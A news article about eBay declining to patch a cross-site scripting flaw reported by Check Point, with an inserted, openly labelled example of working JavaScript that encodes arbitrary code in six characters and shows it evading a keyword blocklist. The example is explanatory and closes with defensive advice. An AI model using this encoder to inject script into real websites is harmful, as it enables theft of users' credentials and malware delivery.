eBay refuses to patch website flaw that can serve up malware

The e-commerce giant confirmed it would not fix the flaw, which could allow an attacker to remotely run code in a user's browser.
Written by Zack Whittaker, Contributor

eBay will not fix a flaw in its website that could allow an attacker to serve malware to unsuspecting site users.

Israeli security firm and firewall maker Check Point disclosed a "severe" vulnerability that would allow an attacker to bypass eBay's code validation and remotely execute malicious code in the browsers of the e-commerce site's users.

Because the injected code runs inside the victim's browser, an attacker could use it to steal local data, inject code into unencrypted pages that tricks a user into handing over usernames and passwords, or trigger malware or ransomware downloads.

An attacker would have to use non-standard code to embed malicious content in their own online store, because the platform prevents scripts and IFRAMEs (which can load third-party site content) from being included in listings. Check Point's researchers were able to bypass some of these script-blocking measures using just six different characters.
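The article does not spell out how six characters are enough to smuggle a script past a filter. The following is an added example, not code from the article, from eBay or from Check Point's report. It assumes the six characters are `[ ] ( ) ! +`, the subset of JavaScript popularly known as JSFuck, in which every string is spelled by indexing into coerced values such as `![]+[]` ("false"). The keyword blacklist in it is a constructed stand-in for a listing filter, not eBay's actual one, and the character table relies on V8's `Function.prototype.toString` output for built-ins (`[].filter + ""`), which the code reads at runtime rather than hard-coding.

```javascript
// Added example: JavaScript written with only the six characters [ ] ( ) ! +
// (the JSFuck technique). Shows why a keyword blacklist cannot stop
// attacker-controlled script: the encoded payload contains no letters at all.

// Number n as a six-character expression: +[] is 0, +!![] is 1,
// !![]+!![] is true+true = 2, and so on.
function num(n) {
  if (n === 0) return "+[]";
  if (n === 1) return "+!![]";
  return Array(n).fill("!![]").join("+");
}

// Character -> expression table. First spelling found wins.
const CHARS = {};
function learn(text, exprForText) {
  [...text].forEach((ch, i) => {
    if (!(ch in CHARS)) CHARS[ch] = `(${exprForText})[${num(i)}]`;
  });
}

// Strings reachable directly: "false", "true", "undefined" and the digits.
learn("false", "![]+[]");         // ![] is false; +[] coerces it to "false"
learn("true", "!![]+[]");
learn("undefined", "[][[]]+[]");  // [] indexed by "" is undefined
for (let d = 0; d <= 9; d++) CHARS[String(d)] = `[${num(d)}]+[]`;

// Spell an arbitrary string by concatenating character expressions.
function str(text) {
  return [...text].map((ch) => {
    if (!(ch in CHARS)) throw new Error(`no six-char spelling for ${JSON.stringify(ch)}`);
    return CHARS[ch];
  }).join("+");
}

// "filter" is spelled from the table above, so [][FILTER] is
// Array.prototype.filter. Coercing that function to a string yields V8's
// "function filter() { [native code] }", which supplies c, o, v and space.
// The text is read from the running engine so the indices are always right.
const FILTER = str("filter");
learn([].filter + "", `[][${FILTER}]+[]`);

// Array.prototype.filter.constructor is Function; calling it with an encoded
// source string compiles and runs attacker-chosen code.
function encodeProgram(code) {
  return `[][${FILTER}][${str("constructor")}](${str(code)})()`;
}

// Checks a practitioner would run over the result.
const SIX_ONLY = /^[\[\]()!+]+$/;
function isSixChar(expr) {
  return SIX_ONLY.test(expr);
}

// Constructed stand-in for a naive listing filter (assumption: not eBay's).
const BLOCKED = /script|javascript|alert|eval|constructor|function|on\w+\s*=/i;
function blacklistPasses(payload) {
  return !BLOCKED.test(payload);
}

// Evaluate an encoded expression the way a browser would once it is on the page.
function run(expr) {
  return Function("return " + expr)();
}

// Demonstration: "return 42" survives the blacklist and still executes.
const payload = encodeProgram("return 42");
console.log("length:", payload.length);
console.log("only [ ] ( ) ! + :", isSixChar(payload));
console.log("passes blacklist   :", blacklistPasses(payload));
console.log("executes to        :", run(payload));
console.log("plain <script> blocked:", !blacklistPasses("<script>alert(1)</script>"));
```

The payload for a nine-character program runs to a few thousand characters, which is why the technique is noticeable to a human but invisible to a filter that looks for words. The defensive lesson is the usual one: a blacklist of dangerous tokens is not a security boundary for user-supplied HTML; only an allowlist-based sanitizer plus a Content Security Policy that forbids inline script actually removes the execution path.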

After Check Point privately reported the vulnerability on December 15, eBay said a month later that it had no plans to fix the flaw.

eBay, which serves more than 162 million users across 30 countries according to its fiscal fourth-quarter earnings, said that it has "not found any fraudulent activity stemming from this incident."

An eBay spokesperson added that, "while not fully patched," the e-commerce giant has "implemented various security filters based on his findings," but did not provide additional details.
